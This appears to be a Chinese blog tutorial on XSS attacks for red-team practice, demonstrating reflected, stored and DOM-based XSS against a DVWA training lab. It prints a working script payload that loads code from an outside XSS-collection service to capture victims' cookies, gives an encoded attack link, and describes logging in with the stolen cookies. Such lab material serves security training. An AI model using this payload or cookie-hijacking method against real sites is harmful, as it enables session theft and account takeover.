HW常见攻击方式 --XSS跨站脚本攻击

简介: HW常见攻击方式 --XSS跨站脚本攻击

一、XSS介绍

跨站脚本攻击(CrossSiteScripting),为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

 

 

二、XSS平台

1、注册登陆账号,没有百分之百的安全,仅供测试交流

  •  
https://xssaq.com/xss.php• 1.

2、新建项目

image.png

3、自动生成要插入的xss代码

  •  
<sCRiPt/SrC=https://xssaq.com/dGLM>• 1.

 

三、反射性xss

1、在存在xss漏洞的网站,插入上面生成的xss代码,点击submit

image.png

 

2、刷新xss平台,会发现有一条数据

image.png

 

3、知道了网址,也知道cookie,下面利用工具登录,不用输入账号密码,直接登录了dvwa平台

image.png

4、反射性xss是一次性的,也就是说,需要人去点击下面的链接,才能触发该漏洞

  •  
http://192.168.1.14/dvwa/vulnerabilities/xss_r/?name=%3CsCRiPt%2FSrC%3Dhttps%3A%2F%2Fxssaq.com%2FdGLM%3E#• 1.

 

 

四、存储型xss

1、在留言板输入上面生成xss代码

image.png

 

2、只要刷新一下该页面,xss平台就出现一条记录,也就是说只要有人看到该留言板,我们就能获取其cookie

3、利用工具登录

4、存储型xss漏洞,理论是永久的,只要有人浏览到你插入的代码,他的cookie信息就会被拿到。

 

 

五、DOM型XSS

1、点击select,发现url中有English,

image.png

2、修改url中english为aaa,发现插入了代码中,所以存在dom型xss注入

image.png

3、插入生成的xss代码,即可获取对方的cookie

目录
相关文章
|
27天前
|
JavaScript 安全 前端开发
js开发:请解释什么是XSS攻击和CSRF攻击,并说明如何防范这些攻击。
XSS和CSRF是两种常见的Web安全威胁。XSS攻击通过注入恶意脚本盗取用户信息或控制账户,防范措施包括输入验证、内容编码、HTTPOnly Cookie和CSP。CSRF攻击则诱使用户执行未经授权操作,防范手段有CSRF Tokens、双重验证、Referer检查和SameSite Cookie属性。开发者应采取这些防御措施并定期进行安全审计以增强应用安全性。
19 0
|
4天前
|
安全 JavaScript Go
跨站脚本攻击(XSS)防护在Django中的应用
【4月更文挑战第15天】本文介绍了Django如何防范XSS攻击。Django模板引擎自动转义HTML以防止恶意脚本,提供`mark_safe`函数和CSRF防护。此外,建议开发者验证清理用户输入、使用内容安全策略、更新库以及遵循安全编码实践来增强防护。通过这些措施,开发者能构建更安全的Web应用。
|
1月前
|
安全 JavaScript 前端开发
Low 级别反射型 XSS 演示(附链接)
Low 级别反射型 XSS 演示(附链接)
17 0
|
1月前
|
存储 JavaScript 前端开发
DOM 型 XSS 演示(附链接)
DOM 型 XSS 演示(附链接)
63 0
|
3月前
|
存储 JSON 前端开发
【面试题】XSS攻击是什么?
【面试题】XSS攻击是什么?
|
3月前
|
存储 开发框架 安全
如何处理预防XSS漏洞攻击问题
防止XSS攻击需要从多个方面入手,包括输入验证和过滤、输出编码、设置正确的HTTP头部、使用最新的安全框架和库、定期进行安全审计和漏洞扫描以及培训和意识提升等。只有综合运用这些措施,才能有效地防止XSS攻击,保护网站和用户的安全。
|
6月前
|
存储 安全 JavaScript
渗透攻击实例-xss跨站脚本攻击
渗透攻击实例-xss跨站脚本攻击
|
1月前
|
存储 前端开发 JavaScript
存储型 XSS 攻击演示(附链接)
存储型 XSS 攻击演示(附链接)
64 0
|
1月前
|
存储 前端开发 JavaScript
反射型 XSS 攻击演示(附链接)
反射型 XSS 攻击演示(附链接)
101 0
|
8月前
|
存储 安全 JavaScript
XSS之攻击与防御
在不少人看来,XSS漏洞造成的危害程度并不大,或者说,一个XSS漏洞的可利用价值并不高。但很多时候看起来一个不起眼的.....